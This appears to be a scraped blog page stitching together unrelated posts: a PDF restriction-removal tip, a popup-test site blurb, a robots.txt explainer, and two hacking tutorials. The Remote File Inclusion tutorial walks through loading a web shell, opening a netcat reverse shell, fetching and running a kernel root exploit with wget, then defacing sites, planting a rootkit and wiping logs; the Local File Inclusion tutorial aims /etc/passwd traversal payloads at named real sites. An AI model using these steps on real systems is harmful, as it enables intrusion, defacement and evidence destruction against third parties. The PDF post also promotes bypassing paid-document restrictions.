techian.com

Remove restriction from pdf file


How to remove restrictions from pdf files [like print option disabled etc..]

Today i downloaded a pdf file of 38mb size. but when i tried to print it..the print option was disabled. i tried to remove the restriction by means of converting the file to doc.. but it was not getting converted . i googled for restriction removal software but they all were asking for $.so finally google helped me and i found a software [freeware] which worked.

download link:
actually it makes a copy of the file whose restrictions is to be removed in the same folder. then u will have a duplicate file [a copy] with no restrictions at all. i saved 1600 Rs. by that downloaded document and 24$ for not purchasing restriction removal tool and using this freeware. Thak god!!

Popularity: 1% [?]

PopupTest.com provides a simple and independent source for popup window testing. Whether you are developing a popup killer software or you are thinking about purchasing one, you can use our sample popups to test the effectiveness of the application.
We are providing samples of the most common popup styles, as well as some not so common ones (as indicated).

Common popup techniques

Multi-PopUp Test
This page launches 10 popup windows, using different techniques…

Multi-PopUp Test #2
This page launches 4 popup windows, using different techniques…

Come & Go Test
This page launches 2 popup when you enter, and an additional one when you leave.

Timed PopUp
This page launches a new popup every 5 seconds…

Mouseover PopUp
Hold your mouse over the text and you’ll see 2 popup windows.

Less common popup techniques

Floating popup
Very annoying, won’t go away until you do…

Channel Opener
Opens a full-screen channel mode window in IE…

Modeless Window
Stays on top until closed…

Full screen trap
Very nasty! In IE, this one opens full screen, and the only way out press Alt+F4 to close it.

Drop down Popup
This one drops into your face from the top of the page…

Floating banner
An animated airplane that grabs an existing banner ad and flies it around the screen… not really a true popup.

Chromeless
A non-standard, borderless popup window…

Sticky popup
This popup floats in the upper right corner like a sticky note…

High-tech popup and floating media
These techniques are too invloved to use local samples, so we are linking to a real web site that uses them instead. Some of these are pretty cool actually, and not near as annoying as the common ones.

EyeBlaster
BlueLayer
TangoZebra Overlays

Not all popups are bad…
but some popup killers are not smart enough to recognize that!

This page has some links that produce popup windows when clicked. A good popup blocker should ignore these and let you open the windows…
Click here

more to come!

Popularity: 1% [?]

Robots.txt harmless? Or dangerous?
By K1u

So alright… what is this strange file in the root of your directories you question?

Let me break down what it basically is… all it basically is, is a rule set for search engines.

Example of a robot.txt file.

# This is my robots.txt file!
User-agent: *
Disallow: /idontwantthisindexedbysearchengines/

Now let me explain what it is line by line.

# This is a User agent… example Firefox or Konqueror, * is anything.
User-agent: *

# This is a rule for search engines not to index this folder.
Disallow: /idontwantthisindexedbysearchengines/

Now lets talk about why robots.txt can be dangerous.

All websites out there that are using the Robots file most likely have it exposed.

Here take this – http://k0h.org/robots.txt

Well your probably asking what do I do now? Instead of using root folders of your “private” things, make a new folder named something like 021873257923 then store the other folder in there. Note… never ever store very important things on your Webserver, even if its protected by robots.txt.

Now lets build our own robots.txt file.

# This is a comment… these are ignored.
User-agent: *
Disallow: /273432087423374242/

User-agent: Googlebot-Image
Disallow: /images

# Alexa’s bot is a bit aggressive so I think I shall make it wait 1 minute (60 seconds) until it can view another page.
User-agent: IA_Archiver
Crawl-Delay: 60

Questions!

Ok… see I have over 300 folders staring with admin… none should be indexed… what do I do? Is there some sort of wildcard I can use?

Simply Disallow: /admin without the ending /.

Are there engines that do not obey robots.txt?

Yep.

My host disallows Robots.txt…

They probably don’t… you just have not tryed selecting view hidden files in your FTP client. Look into others methods… google is your friend.

On a side note. I have not written this in the official tutorial, but alot of people asked me why make a directory 349823423423 for instance and the answer is because it is harder for script kiddies to do a directory name brute force on your site and find out your private directories name.

Popularity: 1% [?]

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to  port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all  

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

  *

Popularity: 1% [?]

Local File Inclusion Tutorial - Written by Xasulrev

[- How to Find LFI Vulnerability -]

How to Find LFI Vulnerability, Well i use me of adding ..
Example

www.site.com/index.php?p=..

Real World Examples:

http://www.jedit.org/index.php?page=..

Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line
 63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.
php on line 63

This is not Vulnerable,
A Vulnerable should look like

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /
home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62

include is the code , the script is using for example

$page = $_GET[page];
include($page);
?>

Should be [function.include]
but

$page = $_GET[page];
require_once($page);
?>

should be [function.require_once] or [function.require]

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..

Gives us.

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear'
) in /indexm.php on line 164

 [b][function.require][/b]

So we know it Vulnerable

if Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php

other try

http://www.crew4sea.com/indexm.php?url=/etc/passwd

http://www.crew4sea.com/indexm.php?url=/etc/passwd

http://www.crew4sea.com/indexm.php?url=../etc/passwd

http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get Something.

Popularity: 1% [?]